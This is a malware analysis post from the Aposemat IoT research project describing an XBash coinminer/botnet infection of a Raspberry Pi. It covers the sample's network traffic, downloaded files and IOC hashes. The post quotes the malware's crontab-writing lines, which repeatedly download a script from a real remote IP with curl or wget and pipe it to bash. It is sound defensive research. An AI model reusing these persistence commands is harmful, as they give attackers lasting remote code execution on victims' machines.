Aposemat IoT Malware Analysis, an X-Bash infection

This blog post was authored by María José Erquiaga (@MaryJo_E), on 2019-05-19

Sample Description

The sample was executed on a Raspberry Pi from our IoT laboratory, and the capture ID is 41-1.
The SHA256 of the sample that we executed in our laboratory is: d8040a64b88b4a738d333015ddd93a27187abb7584412df56633a7e7d12127f4.

As specified by the VirusTotal analysis, this malware could be a CoinMiner; however, the name is not defined. The file name of the sample is mr.sh.

According to the blogpost written by Oleg Kolesnikov and Harshvardhan Parashar from Securonix, this sample belongs to a group of malicious scripts that maintain persistence by creating a cronjob entry. According to that blogpost, the possible name for the malware we executed is XBash.

Another blogpost that describes XBash behavior mentions:

Xbash has ransomware and coinmining capabilities

According to this blogpost by Palo Alto researchers, XBash targeted Linux and Windows systems. XBash is a botnet, coinminer and ransomware with self-propagation capabilities. On Linux, this malware has ransomware and botnet capabilities; on Windows systems, it has coinmining and self-propagating capabilities.

Network behavior

This malware contacted a remote server with IP address 192.99.142.246 on port 8220/TCP and downloaded several files using GNU Wget and curl. The domain registered to that IP is http://www.ovh.com. According to the VirusTotal analysis, some of the files referring to this IP are: mr.sh, 2mr.sh, 3mr.sh. The curl request looks like this:

GET /mr.sh HTTP/1.1
Host: 192.99.142.246:8220 
User-Agent: curl/7.52.1
Accept: */*

The network behavior is repetitive: over a span of 24 hours the infected device contacted the IP 192.99.142.246 on port 8220/TCP and downloaded a total of 8646 files. The malware repeatedly requests the same file names: mr.sh, 2mr.sh, 11, 1.so. The file names are the same; however, the files themselves differ. For example, the file named 1.so was downloaded 4143 times. Two versions of it were compared and turned out to be different files with different SHA256 hashes (see the IoC section).

Downloaded files

Some of the downloaded files are:

According to VirusTotal, the names for those samples are not definitive. Some of them are classified as a type of coin miner, others as a rootkit.

Analysis of the malware code executed

In the sample executed on the Raspberry Pi, it is possible to see that the malware creates files and changes permissions. Then it stops the services iptables and SUSEfirewall. It also kills the processes sysxlj, jourxlv and sustes. Judging from the names of the services and processes, this malware is clearly aiming at Linux-based devices, especially those running SUSE Linux.

The malware creates crontab entries to download files (this behavior matches the network behavior and the behavior analyzed in the blogpost). The portion of the script performing this operation is the following:

echo -e "*/1 * * * * root (curl -s http://192.99.142.246:8220/mr.sh||wget -q -O - http://192.99.142.246:8220/mr.sh)|bash -sh\n##" > /etc/cron.d/root
echo -e "*/2 * * * * root (curl -s http://192.99.142.246:8220/mr.sh||wget -q -O - http://192.99.142.246:8220/mr.sh)|bash -sh\n##" > /etc/cron.d/apache
echo -e "*/30 * * * * (curl -s http://192.99.142.246:8220/mr.sh||wget -q -O - http://192.99.142.246:8220/mr.sh)|bash -sh\n##" > /var/spool/cron/root
mkdir -p /var/spool/cron/crontabs
echo -e "* * * * * (curl -s http://192.99.142.246:8220/mr.sh||wget -q -O - http://192.99.142.246:8220/mr.sh)|bash -sh\n##" > /var/spool/cron/crontabs/root
mkdir -p /etc/cron.hourly
(curl -fsSL --connect-timeout 120 http://192.99.142.246:8220/11 -o /etc/cron.hourly/oanacroner1||http://192.99.142.246:8220/11 -O /etc/cron.hourly/oanacroner1) && chmod 755 /etc/cron.hourly/oanacroner1

IOCs

  • File name: mr.sh
    sha 256: d8040a64b88b4a738d333015ddd93a27187abb7584412df56633a7e7d12127f4

  • File name: 11
    sha 256: 8955a8f071c5de865cfe2c0f58bc3dfb2d6054d037361e4eb56a6dc02780f4a0

  • File name: 2mr.sh
    sha 256: ba74e757ff0a6d0d28f075bf6eef0feba6bb29da9e6e81afcdd12b8b49f69b88

  • File name: 1.so
    sha 256: f7a97548fbd8fd73e31e602d41f30484562c95b6e0659eb37e2c14cbadd1598c

  • File name: 1.so
    sha 256: 90dff83ca6519cbdb490013273c1301f93614c983e2015f3224700ac1f028a8f

Conclusions

In the network capture, this malware doesn't take any more actions at the network level. It basically downloads the listed files several times.

Acknowledgements

This research was done as part of our ongoing collaboration with Avast Software in the Aposemat project. The Aposemat project is funded by Avast Software.

Thanks to Veronica Valeros for her help in the analysis and writing corrections.
